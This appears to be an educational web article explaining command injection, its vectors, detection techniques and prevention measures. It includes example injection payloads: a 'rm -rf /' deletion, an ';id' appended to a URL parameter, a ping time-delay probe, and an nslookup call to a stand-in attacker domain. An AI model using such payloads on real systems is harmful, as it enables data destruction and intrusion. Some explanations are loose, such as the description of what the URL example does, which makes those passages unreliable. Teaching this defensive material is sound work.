What is a Command Injection?

Command Injection Attack - What and How?

Accomplished by sending incidental and corrupted commands towards the host server’s OS, this attack aspires to gain admin-like control of the targeted site or app and its associated elements. Depending upon the intensity, the OWASP command injection attack can influence other application components such as hosting infrastructure, trust between the client and the server, and overall application performance.

How it takes place:

• Its success is more probably when risky elements like HTTP header fields, form components, and session cookies are linked with the user-delivered data
• For complete execution, attackers take the help of any third-party vulnerable resource/application 
• The lack of valid inputs supports the existence of this attack
• This attack doesn’t necessitate the insertion of code. Instead, it deals with expanding the default app capabilities to deploy command injection payloads successfully on the tempered system. 
  

Examples 

1. Let’s say, there is a program that allows users to view file contents but the commands including ";rm -rf /" work for it. An intruder can erase data from the current partition’s contents easily through it.
2. Let’s consider a command injection PHP scenario now. If a corrupted HTTP GET request is accepted in your system, it can manipulate your files, putting them at risk for sure. See this:
   

http ://127.0.0.1/delete.php?filename=inject_demo.txt;id

The above command will delete a file named “inject_demo.txt” from your website/app and can be run by anyone.

Code Injection Vs. Command Injection

As both aim to disintegrate the host server and implicate injecting manipulated elements, it is apparent to consider them alike. However, that’s not 100% true.

Code injection interests exploited code introduction using an app and banks upon the ill-handling of non-trustful data inputs by the end-user. All the attacks, using this mode of action, happen due to the absence of (one of multiple essential) end-user data validation at any stage. The code introduction can be done locally or over the internet.

Speaking of the harms caused, injecting corrupted code can only hamper the targeted system/application. 

For instance, if a threat actor introduces a corrupted PHP code, then the code will be highly driven by the host machine’s PHP functionalities and permissions. Its execution is simple and looks very much similar to Trojan horses.

On the contrary to this, command-injection deals with introducing exploited commands to the shell and other core components. In this method, the attacker doesn’t use any outside code to take the targeted system into control or to hamper it. 

Rather, already present default app functionalities are expanded to spot the vulnerabilities. Once figured out, this security or functionality hole is used to exploit the app. 

This type of attack can also take place via URLs and remote servers. 

Methods Used for Command Injection In General

The occurrence of this vulnerability is possible with the use of the below-mentioned ways:

• Random command injection 
  

There are various applications that allow clients to execute random commands. These apps are more prone to injection through commands as commands can be sent automatically to the host.

• Arbitrary file uploading or usage
  

Applications permitting clients to upload any random file is problematic because attacks can make use of it to carry out command injection attacks. It’s easy to introduce any malicious command using an arbitrary file. 

Mostly, threat actors place such files in the webroot and execute the attack.

• Vulnerable serialization
  

When server-side deserialization is completed without adequate user input verification, it’s easy to perform this attack. 

• Server-side Template Injection 
  

It permits a website to create dynamic HTML responses, which is an opportunity for attackers. The presence of such HTML responses makes malicious command insertion on the server-side templates possible. 

• XML External Entity Injection or XXE 
  

Applications featuring an ill-configured XML parser won’t be able to parse the user-controlled XML inputs properly and create a vulnerability space for the command injection. Taking the advantage, attackers can introduce an exploited command in the XML parser resulting in DDoS and SSRF attacks. Additionally, it will lead to data theft. 

How to find command injection vulnerability?

As command injection vulnerabilities remain hidden mostly, they can go unnoticed many times. Here are a few ways to allow testers/attackers to spot its presence.

• Take the help of time delays 
  

For immediate command injection detection, one can trigger time delays. The ping command is most effective to make this happen, as this command is capable of explaining how many ICMP packets should be shared. The standard running time for this command is:

& ping -c 10 127.0.0.1 &

Activation of this command will compel the application to ping the network adapter for 10 seconds. It will cause the application to ping its loopback network adapter for 10 seconds.

• Try fuzzing
  

Fuzzing is a widely used vulnerability detection technique that can work alone or in collaboration with other methods. It’s usually implemented on the developer-side inputs. 

Fuzzing of the inputs is a fully-automated process that will spot the presence of command injection vulnerabilities in an application. Testers need to fuzz the header of payloads to identify the command injection. Wfuzz, ffuf, and nuclie are some of the most commonly used tools for fuzzing.

• OS Fingerprinting
  

As the prime condition for a command injection success is the payload compatibility with the OS command line syntax, it’s easy to find out the impacted OS. With OS fingerprinting, early command injection detection is possible and is useful for spotting the impacted payloads featuring proper syntax. 

• Out-of-band (OAST) techniques
  

Using an injected command capable of triggering out-of-band network interaction via the OAST technique is a viable detection technique. 

For instance, &nslookup kgji2ohoyw.web-attacker.com & payload utilizes nslookup command to initiate the DNS lookup for a particular domain. The attacker or tester can observe the stipulated DNS lookup and spot the presence of command injection. 

Via an out-of-band channel, one can also filter the injected command output. 

• Redirecting the output 
  

Redirecting the injected command output to the browser-retrieval file confined in the webroot will surface the presence of command injection. 

How to prevent command injection? 

Based upon the impacted application and data it inherits, the outcome of a command injection can be too detrimental. Hence, along with early detection, one must be aware of some of the most viable command injection prevention tactics:

• Safeguard ‘exec’ First
  

Try to avoid “exec” out to the OS as much as possible as it will keep the risks on the lower side. Ensure that most of the application work is done inside the application. 

• Strict Validation Checks
  

Make sure that the untrusted inputs are validated from beginning to end. Introducing non-validated inputs encourages vulnerability in the application. Along with the validation, one must also ensure that the inputs meet the application’s expectations. 

One of the most widely acceptable validation processes is “whitelist validation” which involves accepting only application-compatible input and rejecting others. While performing validation, input components like character set, date bounds, minimum & maximum length, date & numeric bounds, Regular Expression Pattern match value, and many more.

• Neutralize meta-characters
  

There are many meta-characters that hold some importance in the OS command line. So, by neutralizing them, you can prevent their misuse by hackers. It should be done in Windows, Linux, and Unix OS. 

Window users can make this happen by preceding every character with a ‘^’. To neutralize its special meaning, ( ) <>& * ‘ | = ? ; [ ] ^ ~ ! . ” % @ / \ : + , ` needs to be done. 

The procedure is used for Linux and Unix OS. In this case, antecedent of the subsequent characters should be done with an ‘\’ and meaning neutralization can be one with { } ( ) <>& * ‘ | = ? ; [ ] $ – # ~ ! . ” % / \ : + , `. In each case, meaning neutralization will be done to the command-line interpreter. 

• Give Fewer Privileges
  

Implementing least privilege is not direct prevention. But, as it limits the permissions related to the account used for OS command execution, it keeps the risks and incurred harm on the lower side. 

• Use Safe APIs
  

Command execution should be done with the help of secured APIs. Such APIs reduce the command injection risks as they permit the command execution first as a parameter and then as a command-line arguments array. This way, it warrants extensive command validation and takes the form of a valid program, free from risky elements. 

The Final Word

Accountable for many types of havoc, command injection is a type of cyber-attacks influencing the host server and its operations. To keep your data, websites, and customers safe, you must know about it. Read the above article to understand it fully and learn how to prevent it.